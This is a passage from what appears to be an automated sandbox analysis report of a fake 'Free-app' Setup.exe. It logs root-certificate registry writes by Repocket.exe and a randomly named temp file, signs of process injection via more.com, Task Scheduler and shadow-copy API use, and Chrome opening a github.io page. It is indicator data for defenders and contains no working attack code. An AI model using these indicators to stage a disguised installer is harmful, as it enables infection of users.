554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 | C:\Program Files\Geonode\Repocket\Repocket.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 5c000000010000000400000000100000190000000100000010000000787d09f953c59978ecd8d6e44b38e24f030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb1d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a140000000100000014000000dd040907a2f57a7d5253129295ee3880250da65962000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b6909000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410000000f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e72040000000100000010000000866912c070f1ecacacc2d5bca55ba1292000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 | C:\Program Files\Geonode\Repocket\Repocket.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\AnpuTuAZ\xCiuUJiRMbdrF.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB | C:\Program Files\Geonode\Repocket\Repocket.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\more.com | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Free-app_manual_install_2024\Use_2024_to_Open\Setup.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://joseernestoongithub.github.io/mgen/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff5f9ab58,0x7ffff5f9ab68,0x7ffff5f9ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
